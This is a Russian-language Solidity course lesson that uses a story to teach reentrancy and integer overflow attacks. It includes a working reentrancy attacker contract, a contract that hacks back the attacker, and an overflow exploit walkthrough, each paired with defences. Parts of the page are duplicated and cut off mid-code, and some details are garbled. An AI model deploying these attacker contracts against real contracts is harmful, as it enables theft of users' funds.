Reentrancy и Integer Overflow атаки

Путешествие по Solidity & DeFi

Отправляемся в путь

Основы solidity

0/57

Встреча

Hello, Blockchain!

Структура смарт-контракта

Переменные состояния смарт-контракта

Функции и взаимодействие

Операции с данными — основы

Числовые и логические типы данных

Строки, байты и адреса

Локальные переменые и переменные состояния

Константы и неизменяемые переменные

Функции с множественными возвращаемыми значениями

Модификаторы видимости переменных

Модификаторы видимости функций и поведения

Продвинутые операции и безопасность

Remix IDE — знакомство с платформой

Remix IDE — продвинутые возможности

Основы обработки ошибок

Продвинутая обработка ошибок

Кастомные модификаторы

Массивы - основы упорядоченных данных

Mappings - ассоциативные структуры данных

Структуры и Enums - группировка данных

Размещение данных в памяти

Hardhat — установка и настройка

Hardhat — разработка контрактов

Hardhat — тестирование контрактов

Газ – основы. Часть 1: Единицы и опкоды

Газ – стратегии. Часть 2: Оптимизация и MEV

Оптимизация газа — искусство экономии

События

Прием ETH и payable функции

Три способа отправки эфира

Специальные функции обработки получаемого эфира

Паттерны управления деньгами

Переполнение и версии Solidity

Профессиональные техники математики в DeFi

Основы взаимодействия контрактов

Factory Pattern и создание контрактов

Абстрактные контракты и безопасность

Низкоуровневые вызовы между контрактами

Создание токена с нуля

Стандарт ERC-20 и OpenZeppelin

NFT и стандарт ERC-721

Мульти-токены ERC-1155

Основы безопасности и контроль доступа

Reentrancy и Integer Overflow атаки

Продвинутые атаки и защита

Работа со временем в Ethereum

Свойства блоков и транзакций

Основы стейкинга

ABI - основы и кодирование данных

Межконтрактные вызовы через ABI

Декодирование данных и практическое применение ABI

Хеш-функции и проверка целостности данных

Цифровые подписи и аутентификация

Продвинутая криптография и случайность

Основы DAO — децентрализованные автономные организации

Основы блокчейна

0/9

Блокчейн ноды

Адреса и кошельки в блокчейне

Блокчейн транзакции

Блоки

Консенсус и безопасность

Структура базы данных Ethereum

EVM

Ethereum как протокол

Реализация базы данных Ethereum

Основы криптографии

0/10

Алгоритмическая сложность

Хеш-функции

Майнинг и Proof of Work

Основы шифрования

Симметричные и асимметричные алгоритмы

Цифровые подписи

Кошельки, ключи и адреса

Эллиптические кривые

Факторизация

Деревья Меркла

Мир токенов

Скидки на «Starter» и «Pro» до

Выбрать тариф

Reentrancy и Integer Overflow атакиПосле изучения основ безопасности Алекс решил углубиться в изучение конкретных типов атак. Он понял, что знание теории недостаточно — нужно разобрать реальные примеры атак, которые стоили миллионы долларов.
— «Теперь я знаю основные принципы безопасности, — размышлял Алекс. — Но мне нужно изучить, как именно работают самые опасные атаки. Только понимая механизм атаки, можно от неё защититься!»
Основные термины урокаReentrancy атака — тип атаки, при которой злоумышленник использует внешний вызов для повторного входа в функцию до завершения её первого выполнения.
Integer Overflow — когда число становится больше максимального значения типа данных и "переполняется", возвращаясь к минимальному значению.
Integer Underflow — когда число становится меньше минимального значения типа данных и "переполняется", переходя к максимальному значению.
Checks-Effects-Interactions паттерн — безопасный порядок операций: проверки → изменения состояния → внешние взаимодействия.
SafeMath — библиотека OpenZeppelin для безопасных арифметических операций в старых версиях Solidity.
ReentrancyGuard — модификатор от OpenZeppelin для защиты от повторного входа в функции.
Call stack — стек вызовов функций, который может быть использован для reentrancy атак.
Reentrancy атака — как Алекс потерял $100,000 за 10 секундПосле создания безопасного кошелька Алекс решил попробовать себя в DeFi и создал свой первый протокол вкладов. Пользователи могли вносить ETH и получать проценты. Всё работало отлично, пока один день не стал кошмаром.
— «Я был так горд своим новым протоколом! — вспоминал Алекс. — У меня уже было $100,000 депозитов от пользователей. Контракт работал месяцами без проблем. А потом за 10 секунд всё исчезло...»
🔍 Как работает Reentrancy атакаReentrancy — это когда злоумышленник заставляет функцию передавать управление произвольному контракту посередине ее кода. Произвольный контракт может вызвать функцию обратно и она окажется в неконсистентном состоянии. Представьте банк, где кассир выдает деньги, но забывает сразу зачеркнуть сумму в балансе клиента. И клиент может попросить другого кассира снова провести операции с его счетом.
Алекс создал протокол депозитов, который казался безопасным:
Solidity
// ❌ ОПАСНЫЙ контракт Алекса - потерял $100,000!
contract AlexDepositProtocol {
    mapping(address => uint256) public balances;
    uint256 public totalDeposits;
﻿
    function deposit() public payable {
        require(msg.value > 0, "Депозит должен быть больше 0");
        balances[msg.sender] += msg.value;
        totalDeposits += msg.value;
    }
﻿
    function withdraw() public {
        uint256 amount = balances[msg.sender];
        // ❌ ФАТАЛЬНАЯ ОШИБКА: отправляем деньги ДО обновления баланса!
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "Перевод не удался");
﻿
        balances[msg.sender] = 0;  // ⚡ СЛИШКОМ ПОЗДНО!
        totalDeposits -= amount;
    }
﻿
    function getBalance(address user) public view returns (uint256) {
        return balances[user];
    }
﻿
    function getContractBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
⚔️ Анатомия атаки: как хакер украл $100,000Хакер заметил роковую ошибку в коде Алекса и создал атакующий контракт:
Solidity
// ⚔️ АТАКУЮЩИЙ контракт хакера
contract ReentrancyAttacker {
    AlexDepositProtocol public target;
    uint256 public attackAmount = 1 ether;
﻿
    constructor(AlexDepositProtocol _target) {
        target = _target;
    }
﻿
    // Шаг 1: Начинаем атаку
    function startAttack() external payable {
        require(msg.value >= attackAmount, "Нужно больше ETH для атаки");
﻿
        // Делаем легальный депозит
        target.deposit{value: attackAmount}();
﻿
        // Начинаем цепочку вызовов
        target.withdraw();
    }
﻿
    // Шаг 2: Магия происходит здесь!
    receive() external payable {
        // Эта функция вызывается АВТОМАТИЧЕСКИ при получении ETH
﻿
        if (address(target).balance >= attackAmount) {
            // Повторно вызываем withdraw!
            // Но наш баланс в контракте ЕЩЁ НЕ ОБНОВЛЕН!
            target.withdraw();
        }
    }
﻿
    // Забираем украденные средства
    function collectStolenFunds() external {
        payable(msg.sender).transfer(address(this).balance);
    }
}
📚 Пошаговый разбор атаки🏃‍♂️ Что происходило в день атаки:
09:00 — Хакер изучает код контракта Алекса
09:15 — Хакер находит уязвимость: отправка денег ДО обновления баланса
09:30 — Хакер создает атакующий контракт
09:45 — Хакер запускает атаку с 1 ETH
Шаг за шагом:
Хакер вызывает startAttack() с 1 ETH
Контракт Алекса получает депозит:
balances[хакер] = 1 ETH
totalDeposits = 101 ETH (в контракте уже было 100 ETH)
Хакер вызывает withdraw():
✅ Проверка: balances[хакер] >= 1 ETH — УСПЕШНО
🚨 Отправляем 1 ETH хакеру, вызывается функция receive на контракте хакера — ПРОБЛЕМА!
❌ Обновление баланса ЕЩЁ НЕ ПРОИЗОШЛО!
Контракт хакера получает 1 ETH и автоматически вызывает receive():
В контракте Алекса ещё есть 100 ETH
balances[хакер] всё ещё равен 1 ETH!
Хакер СНОВА вызывает withdraw()
Цикл повторяется 100 раз:
Каждый раз проверка balances[хакер] >= 1 ETH проходит успешно
Каждый раз отправляется 1 ETH
Баланс НИКОГДА не обновляется, потому что функция не завершается!
Результат:
Хакер украл 100 ETH = $100,000
У хакера официально было права только на 1 ETH
Контракт опустошен
💔 Последствия для Алекса09:55 — Алекс получает уведомления от пользователей: "Не могу вывести деньги!"
10:00 — Алекс проверяет контракт: баланс = 0 ETH
10:05 — Алекс в панике изучает транзакции
10:10 — Алекс понимает масштаб катастрофы: $100,000 украдено
Алекс был сокрушен:
— «Я думал, что защитил контракт проверками require. Но я не учёл порядок операций! Одна перестановка строк стоила мне и пользователям $100,000!»
✅ Как Алекс исправил проблему: Checks-Effects-InteractionsПосле трагедии Алекс изучил паттерн Checks-Effects-Interactions и переписал контракт:
Solidity
// ✅ БЕЗОПАСНЫЙ контракт - исправленная версия
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
﻿
contract AlexSecureDepositProtocol is ReentrancyGuard {
    mapping(address => uint256) public balances;
    uint256 public totalDeposits;
﻿
    function deposit() public payable {
        require(msg.value > 0, "Депозит должен быть больше 0");
        balances[msg.sender] += msg.value;
        totalDeposits += msg.value;
    }
﻿
    function withdraw(uint256 amount) public nonReentrant {
        // 1. CHECKS: Сначала все проверки
        require(amount > 0, "Сумма должна быть больше 0");
        require(balances[msg.sender] >= amount, "Недостаточно средств");
﻿
        // 2. EFFECTS: Затем изменения состояния
        balances[msg.sender] -= amount;
        totalDeposits -= amount;
﻿
        // 3. INTERACTIONS: И только в конце внешние взаимодействия
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "Перевод не удался");
    }
﻿
    // Дополнительная защита: ручная блокировка от reentrancy
    bool private locked;
﻿
    function withdrawWithManualLock(uint256 amount) public {
        require(!locked, "Функция заблокирована");
        locked = true;
﻿
        require(amount > 0, "Сумма должна быть больше 0");
        require(balances[msg.sender] >= amount, "Недостаточно средств");
﻿
        balances[msg.sender] -= amount;
        totalDeposits -= amount;
﻿
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "Перевод не удался");
﻿
        locked = false;
    }
}
🕵️ Контратака: Алекс находит уязвимость у хакераАлекс потратил бессонную ночь, изучая транзакции атаки. Он был полон решимости найти способ вернуть деньги пользователей. В 6 утра, изучая код атакующего контракта на Etherscan, Алекс вдруг заметил нечто невероятное...
— «Подождите... — прошептал Алекс, вглядываясь в код хакера. — Этот хакер допустил ту же ошибку, что и я! Он забыл защитить функцию collectStolenFunds()!»
🔍 Обнаружение уязвимости в коде хакераАлекс внимательно изучил контракт хакера:
Solidity
// ⚔️ АТАКУЮЩИЙ контракт хакера (С УЯЗВИМОСТЬЮ!)
contract ReentrancyAttacker {
    AlexDepositProtocol public target;
    uint256 public attackAmount = 1 ether;
    address public hacker; // Владелец контракта
﻿
    constructor(AlexDepositProtocol _target) {
        target = _target;
        hacker = msg.sender; // Хакер устанавливает себя владельцем
    }
﻿
    function startAttack() external payable {
        require(msg.value >= attackAmount, "Нужно больше ETH для атаки");
        target.deposit{value: attackAmount}();
        target.withdraw();
    }
﻿
    receive() external payable {
        if (address(target).balance >= attackAmount) {
            target.withdraw();
        }
    }
﻿
    // ❌ КРИТИЧЕСКАЯ ОШИБКА ХАКЕРА: функция НЕ защищена!
    function collectStolenFunds() external {
        // Хакер забыл добавить проверку msg.sender == hacker!
        payable(msg.sender).transfer(address(this).balance);
    }
﻿
    // ✅ Хакер хотел добавить эту защиту, но забыл!
    // function collectStolenFunds() external {
    //     require(msg.sender == hacker, "Only hacker can collect");
    //     payable(hacker).transfer(address(this).balance);
    // }
}
Алекс не мог поверить своим глазам:
— «Хакер украл $100,000 с помощью моей же ошибки, но сам допустил точно такую же! Функция collectStolenFunds() доступна ЛЮБОМУ! Это моя возможность вернуть деньги!»
⚔️ План контратаки Алекса10:30 — Алекс разрабатывает план мести:
Изучить адрес атакующего контракта: 0x1234...hacker_contract
Проверить баланс контракта: 100 ETH все еще там!
Вызвать уязвимую функцию collectStolenFunds()
Перехватить все украденные средства
Вернуть деньги пострадавшим пользователям
🚀 Выполнение контратаки10:45 — Алекс создает контракт для контратаки:
Solidity
// 🛡️ КОНТРАКТ КОНТРАТАКИ Алекса
contract AlexCounterAttack {
    address public alexWallet;
    address public hackerContract = 0x1234...hacker_contract; // Адрес хакера
﻿
    constructor() {
        alexWallet = msg.sender;
    }
﻿
    // Функция для контратаки
    function counterAttack() external {
        require(msg.sender == alexWallet, "Only Alex can execute");
﻿
        // Проверяем что у контракта хакера есть украденные средства
        uint256 stolenAmount = hackerContract.balance;
        require(stolenAmount > 0, "No funds to recover");
﻿
        // Вызываем уязвимую функцию хакера!
        ReentrancyAttacker(hackerContract).collectStolenFunds();
﻿
        // Теперь все украденные ETH у нас!
        require(address(this).balance >= stolenAmount, "Counter-attack failed");
    }
﻿
    // Функция для возврата средств пользователям
    function returnFundsToUsers() external {
        require(msg.sender == alexWallet, "Only Alex");
﻿
        // Отправляем все средства обратно в исправленный протокол депозитов
        uint256 recoveredAmount = address(this).balance;
        payable(alexWallet).transfer(recoveredAmount);
    }
﻿
    // На случай если нужно получить ETH
    receive() external payable {}
}
🎯 Момент истины: контратака11:00 — Алекс запускает контратаку:
Javascript
// Транзакция Алекса
await alexCounterAttack.counterAttack();
Что произошло:
Контракт Алекса вызвал collectStolenFunds() на контракте хакера
Функция выполнилась без проверки авторизации
Все 100 ETH перешли на контракт Алекса вместо хакера!
Хакер остался ни с чем
🎉 Результат контратаки11:05 — Алекс проверяет результаты:
✅ Баланс контракта хакера: 0 ETH
✅ Баланс контракта Алекса: 100 ETH
✅ Украденные средства восстановлены!
Алекс кричал от радости:
— «Получилось! Я использовал собственную ошибку хакера против него! Justice is served!»
💌 Сообщение хакеруАлекс даже отправил сообщение через блокчейн хакеру:
Solidity
// Алекс отправил транзакцию с сообщением в data
"Dear hacker, thank you for the lesson about reentrancy.
Unfortunately, you forgot to secure your own collectStolenFunds() function.
Consider this a lesson in irony. Funds returned to rightful owners. - Alex"
📰 Реакция сообществаИстория о том, как Алекс перехитрил хакера, быстро разлетелась по криптосообществу:
Twitter взорвался комментариями:
🐦 @CryptoNews: "EPIC! Developer outsmarts hacker using hacker's own vulnerability! $100k recovered! 🔥"
🐦 @DeFiDetective: "This is poetic justice at its finest. Hacker got reentrancy'd by his own victim! 😂"
🐦 @SecurityExpert: "Perfect example of why EVERY function needs proper access control. Both victim and attacker learned the hard way."
Хакер ответил через блокчейн:
Code
"Well played, Alex. I underestimated you. This is why I respect the blockchain -
code is law, and apparently my code had the same flaw as yours.
Fair game. - Respectful Adversary"
🎓 Урок для сообществаЭта история стала легендарной в сообществе разработчиков смарт-контрактов. Алекс превратил её в урок:
— «Друзья! Эта история показывает три критически важные вещи:
КАЖДАЯ функция нуждается в защите — даже "внутренние" функции хакеров!
Изучайте код атакующих — в нём тоже могут быть уязвимости!
Справедливость в блокчейне восторжествует — плохой код накажет даже хакеров!
Алекс завершил историю:
— «Иногда справедливость в блокчейне приходит самым неожиданным образом. Хакер научил меня защищаться от reentrancy, а я научил его не забывать про базовую авторизацию. В итоге выиграли пользователи — и это самое главное!»
🛡️ Три способа защиты от ReentrancyСпособ 1: Правильный порядок операций (Checks-Effects-Interactions)
Solidity
function withdraw(uint256 amount) public {
    // CHECKS: проверяем всё что нужно
    require(balances[msg.sender] >= amount);
﻿
    // EFFECTS: изменяем состояние
    balances[msg.sender] -= amount;
﻿
    // INTERACTIONS: взаимодействуем с внешним миром
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
}
Способ 2: ReentrancyGuard от OpenZeppelin
Solidity
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
﻿
contract SecureContract is ReentrancyGuard {
    function withdraw(uint256 amount) public nonReentrant {
        // Модификатор nonReentrant автоматически защищает от повторного входа
    }
}
Способ 3: Ручная блокировка (если нужен особый контроль)
Solidity
contract ManualLock {
    bool private locked;
﻿
    modifier noReentrant() {
        require(!locked, "Reentrancy detected");
        locked = true;
        _;
        locked = false;
    }
﻿
    function withdraw(uint256 amount) public noReentrant {
        // Функция защищена от повторного входа
    }
}
🔥 Реальные примеры reentrancy атак в историиThe DAO (2016) — $50 миллионов украдено
Solidity
// Упрощенная версия уязвимости DAO
function withdraw() public {
    uint256 amount = balances[msg.sender];
    require(amount > 0);
﻿
    // ❌ КРИТИЧЕСКАЯ ОШИБКА: отправка до обновления состояния
    msg.sender.call{value: amount}("");
    balances[msg.sender] = 0;  // Слишком поздно!
}
Cream Finance (2021) — $130 миллионов украдено
Комбинация reentrancy + манипуляция ценой привела к одной из крупнейших потерь в DeFi.
💡 Урок от АлексаАлекс создал памятку для всех разработчиков:
🚨 ЗОЛОТЫЕ ПРАВИЛА защиты от Reentrancy:
ВСЕГДА используйте Checks-Effects-Interactions паттерн
ВСЕГДА добавляйте nonReentrant к функциям с переводами
НИКОГДА не отправляйте деньги до обновления состояния
ВСЕГДА тестируйте атаки reentrancy в своих тестах
ПОМНИТЕ: каждый внешний вызов — потенциальная точка атаки
— «Reentrancy — это как дверь, которая не закрывается после того, как посетитель вошел. Злоумышленник может войти снова и снова, пока вы думаете, что он всё ещё первый раз внутри. Закрывайте дверь (обновляйте состояние) сразу после проверки документов (checks)!»
Integer Overflow — как одно число стоило $20 миллионовInteger Overflow/Underflow: математическая катастрофа в блокчейнеПосле исправления reentrancy уязвимости Алекс решил посмотреть другие примеры атак. Он узнал что в 2018 году мир DeFi потрясла новость: токен BeautyChain потерял все свои средства из-за overflow ошибки.
— «Я думал, что математика в программировании работает как в реальном мире, — вспоминал Алекс. — Если у меня есть 100 токенов, и я отправлю 200, то получу ошибку. Но в Solidity до версии 0.8.0 всё было иначе...»
🔢 Что такое Integer Overflow/Underflow?Overflow — когда число становится больше максимального значения типа данных:
Code
uint8 максимум = 255
255 + 1 = 0 (в старом Solidity!)
Underflow — когда число становится меньше минимального значения:
Code
uint8 минимум = 0
0 - 1 = 255 (в старом Solidity!)
💀 Реальная трагедия: BeautyChain токен (2018)Алекс изучил реальный случай потери $20 миллионов из-за overflow:
Solidity
// ❌ УЯЗВИМЫЙ контракт BeautyChain (упрощенная версия)
pragma solidity ^0.4.24;  // Старая версия без защиты!
﻿
contract VulnerableBeautyToken {
    mapping(address => uint256) public balanceOf;
    uint256 public totalSupply;
﻿
    function batchTransfer(address[] _receivers, uint256 _value) public returns (bool) {
        uint256 cnt = _receivers.length;
        uint256 amount = uint256(cnt) * _value;  // ⚡ OVERFLOW ЗДЕСЬ!
﻿
        require(cnt > 0 && cnt <= 20);
        require(_value > 0 && balanceOf[msg.sender] >= amount);  // Проверяем overflow результат!
﻿
        balanceOf[msg.sender] -= amount;
        for (uint256 i = 0; i < cnt; i++) {
            balanceOf[_receivers[i]] += _value;
        }
        return true;
    }
}
⚔️ Анатомия атаки на BeautyChainХакер обнаружил уязвимость в функции batchTransfer:
Хакер вызвал: batchTransfer([адрес1, адрес2], огромное_число)
Произошло: cnt = 2, _value = очень_большое_число
Overflow: amount = 2 * очень_большое_число = маленькое_число (из-за overflow!)
Проверка прошла: баланс хакера был больше маленького числа
Результат: хакер потратил маленькое количество токенов, но получатели получили огромное количество!
✅ Решение проблемы: современный SoliditySolidity 0.8.0+ (автоматическая защита)
Solidity
// ✅ БЕЗОПАСНЫЙ токен (Solidity 0.8.0+)
pragma solidity ^0.8.0;
﻿
contract AlexSecureToken {
    mapping(address => uint256) public balances;
    uint256 public totalSupply = 1000000;
﻿
    function transfer(address to, uint256 amount) public returns (bool) {
        require(to != address(0), "Нельзя отправлять на нулевой адрес");
        require(balances[msg.sender] >= amount, "Недостаточно средств");
﻿
        // ✅ БЕЗОПАСНО: автоматическая проверка overflow/underflow
        balances[msg.sender] -= amount;  // Автоматически проверяется underflow
        balances[to] += amount;          // Автоматически проверяется overflow
﻿
        return true;
    }
﻿
    // ✅ Безопасная batch функция
    function batchTransfer(address[] memory receivers, uint256 value) public returns (bool) {
        require(receivers.length > 0, "Список получателей пуст");
        require(receivers.length <= 100, "Слишком много получателей");
        require(value > 0, "Значение должно быть больше 0");
﻿
        // ✅ БЕЗОПАСНО: overflow автоматически вызовет ошибку
        uint256 totalAmount = receivers.length * value;
        require(balances[msg.sender] >= totalAmount, "Недостаточно средств");
﻿
        balances[msg.sender] -= totalAmount;
﻿
        for (uint256 i = 0; i < receivers.length; i++) {
            require(receivers[i] != address(0), "Нулевой адрес в списке");
            balances[receivers[i]] += value;
        }
﻿
        return true;
    }
}
💡 Урок от Алекса по overflow🚨 КРИТИЧЕСКИЕ ПРАВИЛА защиты от overflow:
ВСЕГДА используйте Solidity 0.8.0+ для новых проектов
Для старых версий используйте SafeMath от OpenZeppelin
ПРОВЕРЯЙТЕ все арифметические операции в тестах
ОСОБЕННО осторожны с умножением больших чисел
НЕ ДОВЕРЯЙТЕ простым проверкам вида x - y >= 0 в uint
— «Overflow и underflow — это как машина, спидометр которой показывает максимальную скорость, а при превышении сбрасывается на ноль. В старом Solidity машина продолжала ехать, думая что стоит! В новом Solidity она остановится и включит аварийку!»
ЗаключениеВ этом уроке мы детально изучили два самых опасных типа атак в истории блокчейна:
🔑 Reentrancy атаки:Механизм: Повторный вход в функцию до завершения её выполнения
Защита: Checks-Effects-Interactions паттерн и ReentrancyGuard
Реальные потери: The DAO (﻿
130M)
🔢 Integer Overflow/Underflow:Механизм: Переполнение числовых типов данных
Защита: Solidity 0.8.0+ или SafeMath библиотека
Реальные потери: BeautyChain ($20M)
💡 Ключевые выводы:Порядок операций критически важен — сначала обновляйте состояние, потом взаимодействуйте с внешним миром
Используйте современные инструменты — Solidity 0.8.0+ и OpenZeppelin библиотеки
Тестируйте атаки — проверяйте свои контракты на уязвимости
Изучайте реальные случаи — история учит лучше теории
🚨 Помните:Каждая из этих атак стоила миллионы долларов реальных денег. Но теперь, зная их механизмы, вы можете защитить свои контракты от подобных катастроф!
В следующем уроке мы изучим ещё более продвинутые типы атак и создадим полный чек-лист безопасности.

Скидки на «Starter» и «Pro» до

Выбрать тариф

Reentrancy и Integer Overflow атакиПосле изучения основ безопасности Алекс решил углубиться в изучение конкретных типов атак. Он понял, что знание теории недостаточно — нужно разобрать реальные примеры атак, которые стоили миллионы долларов.
— «Теперь я знаю основные принципы безопасности, — размышлял Алекс. — Но мне нужно изучить, как именно работают самые опасные атаки. Только понимая механизм атаки, можно от неё защититься!»
Основные термины урокаReentrancy атака — тип атаки, при которой злоумышленник использует внешний вызов для повторного входа в функцию до завершения её первого выполнения.
Integer Overflow — когда число становится больше максимального значения типа данных и "переполняется", возвращаясь к минимальному значению.
Integer Underflow — когда число становится меньше минимального значения типа данных и "переполняется", переходя к максимальному значению.
Checks-Effects-Interactions паттерн — безопасный порядок операций: проверки → изменения состояния → внешние взаимодействия.
SafeMath — библиотека OpenZeppelin для безопасных арифметических операций в старых версиях Solidity.
ReentrancyGuard — модификатор от OpenZeppelin для защиты от повторного входа в функции.
Call stack — стек вызовов функций, который может быть использован для reentrancy атак.
Reentrancy атака — как Алекс потерял $100,000 за 10 секундПосле создания безопасного кошелька Алекс решил попробовать себя в DeFi и создал свой первый протокол вкладов. Пользователи могли вносить ETH и получать проценты. Всё работало отлично, пока один день не стал кошмаром.
— «Я был так горд своим новым протоколом! — вспоминал Алекс. — У меня уже было $100,000 депозитов от пользователей. Контракт работал месяцами без проблем. А потом за 10 секунд всё исчезло...»
🔍 Как работает Reentrancy атакаReentrancy — это когда злоумышленник заставляет функцию передавать управление произвольному контракту посередине ее кода. Произвольный контракт может вызвать функцию обратно и она окажется в неконсистентном состоянии. Представьте банк, где кассир выдает деньги, но забывает сразу зачеркнуть сумму в балансе клиента. И клиент может попросить другого кассира снова провести операции с его счетом.
Алекс создал протокол депозитов, который казался безопасным:
Solidity
// ❌ ОПАСНЫЙ контракт Алекса - потерял $100,000!
contract AlexDepositProtocol {
    mapping(address => uint256) public balances;
    uint256 public totalDeposits;
﻿
    function deposit() public payable {
        require(msg.value > 0, "Депозит должен быть больше 0");
        balances[msg.sender] += msg.value;
        totalDeposits += msg.value;
    }
﻿
    function withdraw() public {
        uint256 amount = balances[msg.sender];
        // ❌ ФАТАЛЬНАЯ ОШИБКА: отправляем деньги ДО обновления баланса!
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "Перевод не удался");
﻿
        balances[msg.sender] = 0;  // ⚡ СЛИШКОМ ПОЗДНО!
        totalDeposits -= amount;
    }
﻿
    function getBalance(address user) public view returns (uint256) {
        return balances[user];
    }
﻿
    function getContractBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
⚔️ Анатомия атаки: как хакер украл $100,000Хакер заметил роковую ошибку в коде Алекса и создал атакующий контракт:
Solidity
// ⚔️ АТАКУЮЩИЙ контракт хакера
contract ReentrancyAttacker {
    AlexDepositProtocol public target;
    uint256 public attackAmount = 1 ether;
﻿
    constructor(AlexDepositProtocol _target) {
        target = _target;
    }
﻿
    // Шаг 1: Начинаем атаку
    function startAttack() external payable {
        require(msg.value >= attackAmount, "Нужно больше ETH для атаки");
﻿
        // Делаем легальный депозит
        target.deposit{value: attackAmount}();
﻿
        // Начинаем цепочку вызовов
        target.withdraw();
    }
﻿
    // Шаг 2: Магия происходит здесь!
    receive() external payable {
        // Эта функция вызывается АВТОМАТИЧЕСКИ при получении ETH
﻿
        if (address(target).balance >= attackAmount) {
            // Повторно вызываем withdraw!
            // Но наш баланс в контракте ЕЩЁ НЕ ОБНОВЛЕН!
            target.withdraw();
        }
    }
﻿
    // Забираем украденные средства
    function collectStolenFunds() external {
        payable(msg.sender).transfer(address(this).balance);
    }
}
📚 Пошаговый разбор атаки🏃‍♂️ Что происходило в день атаки:
09:00 — Хакер изучает код контракта Алекса
09:15 — Хакер находит уязвимость: отправка денег ДО обновления баланса
09:30 — Хакер создает атакующий контракт
09:45 — Хакер запускает атаку с 1 ETH
Шаг за шагом:
Хакер вызывает startAttack() с 1 ETH
Контракт Алекса получает депозит:
balances[хакер] = 1 ETH
totalDeposits = 101 ETH (в контракте уже было 100 ETH)
Хакер вызывает withdraw():
✅ Проверка: balances[хакер] >= 1 ETH — УСПЕШНО
🚨 Отправляем 1 ETH хакеру, вызывается функция receive на контракте хакера — ПРОБЛЕМА!
❌ Обновление баланса ЕЩЁ НЕ ПРОИЗОШЛО!
Контракт хакера получает 1 ETH и автоматически вызывает receive():
В контракте Алекса ещё есть 100 ETH
balances[хакер] всё ещё равен 1 ETH!
Хакер СНОВА вызывает withdraw()
Цикл повторяется 100 раз:
Каждый раз проверка balances[хакер] >= 1 ETH проходит успешно
Каждый раз отправляется 1 ETH
Баланс НИКОГДА не обновляется, потому что функция не завершается!
Результат:
Хакер украл 100 ETH = $100,000
У хакера официально было права только на 1 ETH
Контракт опустошен
💔 Последствия для Алекса09:55 — Алекс получает уведомления от пользователей: "Не могу вывести деньги!"
10:00 — Алекс проверяет контракт: баланс = 0 ETH
10:05 — Алекс в панике изучает транзакции
10:10 — Алекс понимает масштаб катастрофы: $100,000 украдено
Алекс был сокрушен:
— «Я думал, что защитил контракт проверками require. Но я не учёл порядок операций! Одна перестановка строк стоила мне и пользователям $100,000!»
✅ Как Алекс исправил проблему: Checks-Effects-InteractionsПосле трагедии Алекс изучил паттерн Checks-Effects-Interactions и переписал контракт:
Solidity
// ✅ БЕЗОПАСНЫЙ контракт - исправленная версия
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
﻿
contract AlexSecureDepositProtocol is ReentrancyGuard {
    mapping(address => uint256) public balances;
    uint256 public totalDeposits;
﻿
    function deposit() public payable {
        require(msg.value > 0, "Депозит должен быть больше 0");
        balances[msg.sender] += msg.value;
        totalDeposits += msg.value;
    }
﻿
    function withdraw(uint256 amount) public nonReentrant {
        // 1. CHECKS: Сначала все проверки
        require(amount > 0, "Сумма должна быть больше 0");
        require(balances[msg.sender] >= amount, "Недостаточно средств");
﻿
        // 2. EFFECTS: Затем изменения состояния
        balances[msg.sender] -= amount;
        totalDeposits -= amount;
﻿
        // 3. INTERACTIONS: И только в конце внешние взаимодействия
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "Перевод не удался");
    }
﻿
    // Дополнительная защита: ручная блокировка от reentrancy
    bool private locked;
﻿
    function withdrawWithManualLock(uint256 amount) public {
        require(!locked, "Функция заблокирована");
        locked = true;
﻿
        require(amount > 0, "Сумма должна быть больше 0");
        require(balances[msg.sender] >= amount, "Недостаточно средств");
﻿
        balances[msg.sender] -= amount;
        totalDeposits -= amount;
﻿
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "Перевод не удался");
﻿
        locked = false;
    }
}
🕵️ Контратака: Алекс находит уязвимость у хакераАлекс потратил бессонную ночь, изучая транзакции атаки. Он был полон решимости найти способ вернуть деньги пользователей. В 6 утра, изучая код атакующего контракта на Etherscan, Алекс вдруг заметил нечто невероятное...
— «Подождите... — прошептал Алекс, вглядываясь в код хакера. — Этот хакер допустил ту же ошибку, что и я! Он забыл защитить функцию collectStolenFunds()!»
🔍 Обнаружение уязвимости в коде хакераАлекс внимательно изучил контракт хакера:
Solidity
// ⚔️ АТАКУЮЩИЙ контракт хакера (С УЯЗВИМОСТЬЮ!)
contract ReentrancyAttacker {
    AlexDepositProtocol public target;
    uint256 public attackAmount = 1 ether;
    address public hacker; // Владелец контракта
﻿
    constructor(AlexDepositProtocol _target) {
        target = _target;
        hacker = msg.sender; // Хакер устанавливает себя владельцем
    }
﻿
    function startAttack() external payable {
        require(msg.value >= attackAmount, "Нужно больше ETH для атаки");
        target.deposit{value: attackAmount}();
        target.withdraw();
    }
﻿
    receive() external payable {
        if (address(target).balance >= attackAmount) {
            target.withdraw();
        }
    }
﻿
    // ❌ КРИТИЧЕСКАЯ ОШИБКА ХАКЕРА: функция НЕ защищена!
    function collectStolenFunds() external {
        // Хакер забыл добавить проверку msg.sender == hacker!
        payable(msg.sender).transfer(address(this).balance);
    }
﻿
    // ✅ Хакер хотел добавить эту защиту, но забыл!
    // function collectStolenFunds() external {
    //     require(msg.sender == hacker, "Only hacker can collect");
    //     payable(hacker).transfer(address(this).balance);
    // }
}
Алекс не мог поверить своим глазам:
— «Хакер украл $100,000 с помощью моей же ошибки, но сам допустил точно такую же! Функция collectStolenFunds() доступна ЛЮБОМУ! Это моя возможность вернуть деньги!»
⚔️ План контратаки Алекса10:30 — Алекс разрабатывает план мести:
Изучить адрес атакующего контракта: 0x1234...hacker_contract
Проверить баланс контракта: 100 ETH все еще там!
Вызвать уязвимую функцию collectStolenFunds()
Перехватить все украденные средства
Вернуть деньги пострадавшим пользователям
🚀 Выполнение контратаки10:45 — Алекс создает контракт для контратаки:
Solidity
// 🛡️ КОНТРАКТ КОНТРАТАКИ Алекса
contract AlexCounterAttack {
    address public alexWallet;
    address public hackerContract = 0x1234...hacker_contract; // Адрес хакера
﻿
    constructor() {
        alexWallet = msg.sender;
    }
﻿
    // Функция для контратаки
    function counterAttack() external {
        require(msg.sender == alexWallet, "Only Alex can execute");
﻿
        // Проверяем что у контракта хакера есть украденные средства
